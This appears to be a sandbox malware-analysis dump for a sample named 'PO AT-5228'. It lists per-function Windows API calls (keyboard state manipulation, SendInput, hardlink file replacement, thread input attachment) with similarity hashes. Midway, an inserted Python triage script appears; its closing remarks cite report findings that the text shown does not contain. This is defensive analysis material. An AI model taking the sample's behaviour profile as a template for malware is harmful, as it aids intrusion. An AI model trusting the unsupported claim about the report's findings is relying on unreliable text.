• LoadLibraryA.KERNEL32(kernel32.dll,00B641BB,00B64341,?,00B6422F,?,00B641BB,?,?,?,?,00B639FE,?,00000001), ref: 00B64359
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B6436B
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: f3d56e63b754b97e114cb5b5c6f0829febddd1b0865f84ff5ab9f1f8a287daf2
• Instruction ID: d0d94883b5f95a11c68a5cdd14910419d3f48199ce42cc9be0bebec6a8479a6c
• Opcode Fuzzy Hash: f3d56e63b754b97e114cb5b5c6f0829febddd1b0865f84ff5ab9f1f8a287daf2
• Instruction Fuzzy Hash: 43D05234900B12AEC7204B30A8486827AE8EB2171AB00847AE882E2250EBB4D8808A14
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,?,00BA051D,?,00BA05FE), ref: 00BA0547
• GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00BA0559
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1071820185
• Opcode ID: 05eecd73a51fed28ca4973872898d40c8ed95db067c0e5efa345e4d6b8bc20f1
• Instruction ID: 4a95168cfd2f8f6977cf4bc926dabc2dbd51a0722830bed6e55bcf143d5efb4e
• Opcode Fuzzy Hash: 05eecd73a51fed28ca4973872898d40c8ed95db067c0e5efa345e4d6b8bc20f1
• Instruction Fuzzy Hash: 56D0C7749647229FDB209F65E888741B6E4EB16711F14C46DE456E3150DAB0C8C19B51
APIs
• LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00BA052F,?,00BA06D7), ref: 00BA0572
• GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00BA0584
Similarity
• API ID: AddressLibraryLoadProc
• String ID: UnRegisterTypeLibForUser$oleaut32.dll
• API String ID: 2574300362-1587604923
• Opcode ID: b7227a4cd7ca7dd934cd88a0775f7ca626614d2bd37604d6798142df77004bf9
• Instruction ID: 5a0af59e406b0ce875a04f0554938e99d57c3cacf00b517a88bdb1cb947c5f24
• Opcode Fuzzy Hash: b7227a4cd7ca7dd934cd88a0775f7ca626614d2bd37604d6798142df77004bf9
• Instruction Fuzzy Hash: C0D0A7349183229FC7206FB0E888B4277E4EB16300F10846DE881E3150DBB0C4C49F20
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00BBECBE,?,00BBEBBB), ref: 00BBECD6
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00BBECE8
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
• Opcode ID: f5f59698099b171ea82398e34a9b3e02b5892235d88b10bdd6e64bf8a73ce5cb
• Instruction ID: f95ab98a8b8d33ba0170aff164c50bbc3cb6cf8a28fc2b564dbf544e822e04f3
• Opcode Fuzzy Hash: f5f59698099b171ea82398e34a9b3e02b5892235d88b10bdd6e64bf8a73ce5cb
• Instruction Fuzzy Hash: D0D0A7345007239FCB205F60E8887D27AE4EF05301B00846DF855E7160DFF0C8C49750
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,00BBBAD3,00000001,00BBB6EE,?,00BFDC00), ref: 00BBBAEB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00BBBAFD
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 575a9f451959cffbb35d4bba3e60ecd10450a14b99a6b34ac16bd826cfbec13f
• Instruction ID: 16ba20facf355603fc8a4dfa1a199ff6dd4364db1d8bd09177b6e6ede0cbd586
• Opcode Fuzzy Hash: 575a9f451959cffbb35d4bba3e60ecd10450a14b99a6b34ac16bd826cfbec13f
• Instruction Fuzzy Hash: 36D092789007129FDB349F65A888BA276E8EB05751B10846EA897A2254EBF0D880CA51
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00BC3BD1,?,00BC3E06), ref: 00BC3BE9
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BC3BFB
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: d531d93e78874d3982d83edddb06e9086317ee9c4a989ef24df03d9dc39e0433
• Instruction ID: d1f9d2170ad23a32f310759bf5600fb6f00cc393601746650fcb03d301a1e405
• Opcode Fuzzy Hash: d531d93e78874d3982d83edddb06e9086317ee9c4a989ef24df03d9dc39e0433
• Instruction Fuzzy Hash: 4DD0A7705007529FC7205F60E848B47BAF4EB02718B10846DF445F3250DAF4C4C08F10
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3487a5c5d26573959ebe7c17e130244cf0f3381e6d290567af407bdc0e495750
• Instruction ID: 4228bc4110ae1db83ed8b4397404c0741d07fa34717fb569e1bc9114c556cb51
• Opcode Fuzzy Hash: 3487a5c5d26573959ebe7c17e130244cf0f3381e6d290567af407bdc0e495750
• Instruction Fuzzy Hash: 03C12B75A0021AEFDF54DF98C884AAEB7F5FF48700F1085ACE905AB251D7319E81DB90
APIs
• CoInitialize.OLE32(00000000), ref: 00BBAAB4
• CoUninitialize.OLE32 ref: 00BBAABF
  • Part of subcall function 00BA0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BA027B
• VariantInit.OLEAUT32(?), ref: 00BBAACA
• VariantClear.OLEAUT32(?), ref: 00BBAD9D
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 54923b5ebf5e46bbe327bb0d14bce105b76acf9da20930c562a5b9443e6edc65
• Instruction ID: e1694680ef93b043cf988cf8bc5aac367bad8908d8f3e6d29db96f94bd694a76
• Opcode Fuzzy Hash: 54923b5ebf5e46bbe327bb0d14bce105b76acf9da20930c562a5b9443e6edc65
• Instruction Fuzzy Hash: E8A14B356047019FDB10DF18C891B6AB7E5FF88710F148499F99A9B3A2CB74ED44CB86
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: dcd2736a5abd28649f6e8d68555cf1ec69bab5ec69b0f9b1b742196a08b9ef2d
• Instruction ID: 282bdbed43d2e948570a7a117c072a6702be15224bd68692a795961ab12be974
• Opcode Fuzzy Hash: dcd2736a5abd28649f6e8d68555cf1ec69bab5ec69b0f9b1b742196a08b9ef2d
• Instruction Fuzzy Hash: 43518230608306ABDFA49F6DD4D1A2EB7E5EF55310B24C8BFE55ACB2D1DB7498808709
                                                                                        APIs
                                                                                          • Part of subcall function 00B64517: _fseek.LIBCMT ref: 00B6452F
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC65D
                                                                                          • Part of subcall function 00BAC56D: _wcscmp.LIBCMT ref: 00BAC670
                                                                                        • _free.LIBCMT ref: 00BAC4DD
                                                                                        • _free.LIBCMT ref: 00BAC4E4
                                                                                        • _free.LIBCMT ref: 00BAC54F
                                                                                          • Part of subcall function 00B81C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00B87A85), ref: 00B81CB1
                                                                                          • Part of subcall function 00B81C9D: GetLastError.KERNEL32(00000000,?,00B87A85), ref: 00B81CC3
                                                                                        • _free.LIBCMT ref: 00BAC557
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        • Opcode ID: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                        • Instruction ID: 56f34d0ced4a4fe6086e913f59f60c9aa3312c1205c603ff0b394a6916a766d1
                                                                                        • Opcode Fuzzy Hash: 0291d278fd3c0ee10044b808818b9d6c21fdc9175ee32bef741d63fe6815c47f
                                                                                        • Instruction Fuzzy Hash: 01514CB1904218AFDB149F68DC81AAEBBB9EF49300F1004EEF259A7251DB755A80CF59
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(01949590,?), ref: 00BCC544
                                                                                        • ScreenToClient.USER32(?,00000002), ref: 00BCC574
                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00BCC5DA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                        • String ID:
                                                                                        • API String ID: 3880355969-0
                                                                                        • Opcode ID: 76b7660b78fb9e348dd8e08998d261a975541c5b02ddf71e1806bda1a7e37af4
                                                                                        • Instruction ID: 3c36224b3ba83f36220f82c36ec0cb812711a5a3611506db5d799eb7a7b9ecfc
                                                                                        • Opcode Fuzzy Hash: 76b7660b78fb9e348dd8e08998d261a975541c5b02ddf71e1806bda1a7e37af4
                                                                                        • Instruction Fuzzy Hash: 43512E75900104EFCF20DF68C881EAE7BF5EB65320F1486A9F9599B291D770ED41CB90
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B9C462
                                                                                        • __itow.LIBCMT ref: 00B9C49C
                                                                                          • Part of subcall function 00B9C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B9C753
                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B9C505
                                                                                        • __itow.LIBCMT ref: 00B9C55A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: 43aca624aa85876a80c1d07ed4069fecc4f125cf04024073a182177b8d982091
                                                                                        • Instruction ID: f2bf938506971eca60a9e2b079627eb184678a3a5d9b98badc1de3d6ad979781
                                                                                        • Opcode Fuzzy Hash: 43aca624aa85876a80c1d07ed4069fecc4f125cf04024073a182177b8d982091
                                                                                        • Instruction Fuzzy Hash: 77418271A00208AFDF25EF54C852BEE7FF9EF59700F0040A9FA05A7291DB749A55CBA1
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BA3966
                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BA3982
                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00BA39EF
                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00BA3A4D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: aedcaa05c0046a74ded6ace9553f9c4e468f3b3ef0d8066dff685b7b0ed109ba
                                                                                        • Instruction ID: b5925a92d80564ad86f597f0df824495edf2677a5b15164cd8aa8edd91472b2c
                                                                                        • Opcode Fuzzy Hash: aedcaa05c0046a74ded6ace9553f9c4e468f3b3ef0d8066dff685b7b0ed109ba
                                                                                        • Instruction Fuzzy Hash: E5412970A0C258AEEF248B64C8467FEBBF5DB57710F04019AF4C2561C1C7B58E85D761
                                                                                        APIs
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BAE742
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 00BAE768
                                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BAE78D
                                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BAE7B9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                        • String ID:
                                                                                        • API String ID: 3321077145-0
                                                                                        • Opcode ID: 43a132df807db5ede35005f0e4b7cb91ef823ea5c4c5821edc0fd9456595605c
                                                                                        • Instruction ID: 406b60870b66fb1da642395deaacda6e52ac95d8a36ff0f15886f3d7c6ed356c
                                                                                        • Opcode Fuzzy Hash: 43a132df807db5ede35005f0e4b7cb91ef823ea5c4c5821edc0fd9456595605c
                                                                                        • Instruction Fuzzy Hash: C74104396006109FCF11AF15C484A4DBBE5FF9A710B0984D8E95AAB3A2CB78FD008B95
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BCB5D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: a8fbf2f08631a4c93c10e129f2ba72bb32dd280b5e0f0f88bd9b3efab5e44268
                                                                                        • Instruction ID: a83a5eded9006dd265b48b9b4363f8ea45a4c290ffa7a4c7a8b8327bb7497e2f
                                                                                        • Opcode Fuzzy Hash: a8fbf2f08631a4c93c10e129f2ba72bb32dd280b5e0f0f88bd9b3efab5e44268
                                                                                        • Instruction Fuzzy Hash: B831DC74601208EFEF208F18CC9AFACB7E5EB25310F6441A9FA51D72E1CB30A9408B51
                                                                                        APIs
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCD807
                                                                                        • GetWindowRect.USER32(?,?), ref: 00BCD87D
                                                                                        • PtInRect.USER32(?,?,00BCED5A), ref: 00BCD88D
                                                                                        • MessageBeep.USER32(00000000), ref: 00BCD8FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1352109105-0
                                                                                        • Opcode ID: 366ce60c0af63c1d8ce28c6d08d7c38e69dbdb740fe973dcd76da39f0e306457
                                                                                        • Instruction ID: 49902431f7d6e263711c2306deb48bc46b06835a8270cbd19632c49bf34fe09c
                                                                                        • Opcode Fuzzy Hash: 366ce60c0af63c1d8ce28c6d08d7c38e69dbdb740fe973dcd76da39f0e306457
                                                                                        • Instruction Fuzzy Hash: 63415378A00219DFCB21DF58D884FADBBF5FB88310F1881F9E8559B2A4D730A946CB50
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00BA3AB8
                                                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BA3AD4
                                                                                        • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00BA3B34
                                                                                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00BA3B92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                        • String ID:
                                                                                        • API String ID: 432972143-0
                                                                                        • Opcode ID: 699c6426c6d7c5fc68c82968f65bf2523307f22615aa301eb17f94d9e4b10e4b
                                                                                        • Instruction ID: 5bcd56a68de0ef249a4a8271cf53d0871216afe04b24ef8a4775c908d8329176
                                                                                        • Opcode Fuzzy Hash: 699c6426c6d7c5fc68c82968f65bf2523307f22615aa301eb17f94d9e4b10e4b
                                                                                        • Instruction Fuzzy Hash: 40315530A08258AEEF248B68C859BFE7BE6DB57710F84019AF481972D1C7748F85D771
                                                                                        APIs
                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B94038
                                                                                        • __isleadbyte_l.LIBCMT ref: 00B94066
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B94094
                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00B940CA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                        • String ID:
                                                                                        • API String ID: 3058430110-0
                                                                                        • Opcode ID: 41963ff026f2e304f19793c1454f2ec28c13a55de7f01da78a91a80193e2cc85
                                                                                        • Instruction ID: 47d5dffc9b987943a47906d811b52f72044027a8b6e543532f0db3d0ffd312a7
                                                                                        • Opcode Fuzzy Hash: 41963ff026f2e304f19793c1454f2ec28c13a55de7f01da78a91a80193e2cc85
                                                                                        • Instruction Fuzzy Hash: BC31BE31600246AFDF229F75C884FAA7BE5FF41310F1585B8EA658B1A0E731D892DB90
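The per-function blocks in this report all follow one fixed layout: an APIs list (direct calls plus indented "Part of subcall function" lines, each with its hex arguments and a ref address), a Memory Dump Source block, and the Similarity hashes. The Python below is an added example, not Joe Sandbox code, that parses that layout into a triage table: it extracts every call's name, module, arguments and ref, decodes the window-message constants passed to SendMessageW/PostMessageW (0x0102 WM_CHAR, 0x0101 WM_KEYUP, 0x110A TVM_GETNEXTITEM, 0x113E TVM_GETITEMW), and tags entries whose call set matches a behaviour worth a second look. The embedded sample is a constructed excerpt copied from four of the entries above; the rule table, the tag names and the function names are this example's own assumptions.

```python
"""Turn Joe Sandbox per-function 'APIs' blocks into a triage table.

Added example for this report page (not Joe Sandbox code). SAMPLE_REPORT is a
constructed excerpt of four entries from the page; BEHAVIOUR_RULES and the tag
names are assumptions chosen for illustration.
"""
import re
from collections import namedtuple

Call = namedtuple("Call", "name module args ref subcall")

SAMPLE_REPORT = """\
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BA3966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00BA3982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00BA39EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00BA3A4D
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
Similarity
• API ID: KeyboardState$InputMessagePostSend
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BAE742
• GetLastError.KERNEL32(?,00000000), ref: 00BAE768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BAE78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BAE7B9
Memory Dump Source
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00B9C462
• __itow.LIBCMT ref: 00B9C49C
  • Part of subcall function 00B9C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00B9C753
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00B9C505
• __itow.LIBCMT ref: 00B9C55A
Memory Dump Source
Similarity
• API ID: MessageSend$__itow
APIs
• GetForegroundWindow.USER32 ref: 00BC7CB9
  • Part of subcall function 00BA5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA5F6F
  • Part of subcall function 00BA5F55: GetCurrentThreadId.KERNEL32 ref: 00BA5F76
  • Part of subcall function 00BA5F55: AttachThreadInput.USER32(00000000,?,00BA781F), ref: 00BA5F7D
• GetCaretPos.USER32(?), ref: 00BC7CCA
• ClientToScreen.USER32(00000000,?), ref: 00BC7D03
Memory Dump Source
"""

# One API line: optional subcall prefix, Name.MODULE, optional (args), ref: ADDR.
_API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[\w:]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
_API_ID = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S+)")

# Window messages seen in this report (real Win32 constants).
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP", 0x0102: "WM_CHAR",
                   0x110A: "TVM_GETNEXTITEM", 0x113E: "TVM_GETITEMW"}

# Assumed triage rules: an entry gets the tag if it calls every API in the set.
BEHAVIOUR_RULES = {
    "synthetic-keyboard-input": {"SendInput", "SetKeyboardState"},
    "hardlink-file-replacement": {"CreateHardLinkW", "DeleteFileW"},
    "cross-thread-input-attach": {"AttachThreadInput"},
}


def _parse_args(raw):
    """8-hex-digit arguments become ints; '?' (unrecoverable) becomes None."""
    if raw is None:
        return ()
    return tuple(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a.strip()) else None
                 for a in raw.split(","))


def parse_entries(text):
    """Split report text into entries: {'api_id': str|None, 'calls': [Call]}."""
    entries, cur, in_apis = [], None, False
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                      # a new function entry starts here
            cur = {"api_id": None, "calls": []}
            entries.append(cur)
            in_apis = True
            continue
        if cur is None:
            continue
        if s == "Memory Dump Source":        # end of this entry's call list
            in_apis = False
            continue
        m = _API_ID.match(line)
        if m:
            cur["api_id"] = m.group("id")
            continue
        m = _API_LINE.match(line) if in_apis else None
        if m:
            cur["calls"].append(Call(m.group("name"), m.group("module"),
                                     _parse_args(m.group("args")),
                                     m.group("ref").upper(),
                                     m.group("sub") is not None))
    return entries


def decode_messages(entry):
    """(ref, message name) for each Send/PostMessage call whose uMsg is known."""
    out = []
    for c in entry["calls"]:
        if c.name in ("SendMessageW", "PostMessageW", "SendMessageA", "PostMessageA") \
                and len(c.args) > 1 and c.args[1] is not None:
            out.append((c.ref, WINDOW_MESSAGES.get(c.args[1], "0x%04X" % c.args[1])))
    return out


def tag_entry(entry):
    """Behaviour tags for one entry; subcall lines count, since the call happens."""
    names = {c.name for c in entry["calls"]}
    tags = [tag for tag, needed in BEHAVIOUR_RULES.items() if needed <= names]
    if any(msg.startswith("TVM_") for _, msg in decode_messages(entry)):
        tags.append("treeview-control-enumeration")
    return tags


def triage(text):
    """One row per entry with calls: first direct-call ref, API ID, tags, messages."""
    rows = []
    for e in parse_entries(text):
        if not e["calls"]:
            continue
        direct = [c for c in e["calls"] if not c.subcall] or e["calls"]
        rows.append({"function": direct[0].ref, "api_id": e["api_id"],
                     "tags": tag_entry(e), "messages": decode_messages(e)})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_REPORT):
        print(row["function"], row["api_id"], row["tags"], row["messages"])
```

Run it over the full report text instead of SAMPLE_REPORT to get one row per function. Treat the tags as triage hints, not verdicts: keyboard simulation through SetKeyboardState/SendInput and caret lookup through AttachThreadInput are the kind of routines an interpreter runtime ships regardless of what the script does, which fits the report's own finding that this binary is a compiled AutoIt script, so a tag only earns attention when it lines up with the injection and credential-theft signatures listed at the top of the report.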
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 00BC7CB9
                                                                                          • Part of subcall function 00BA5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA5F6F
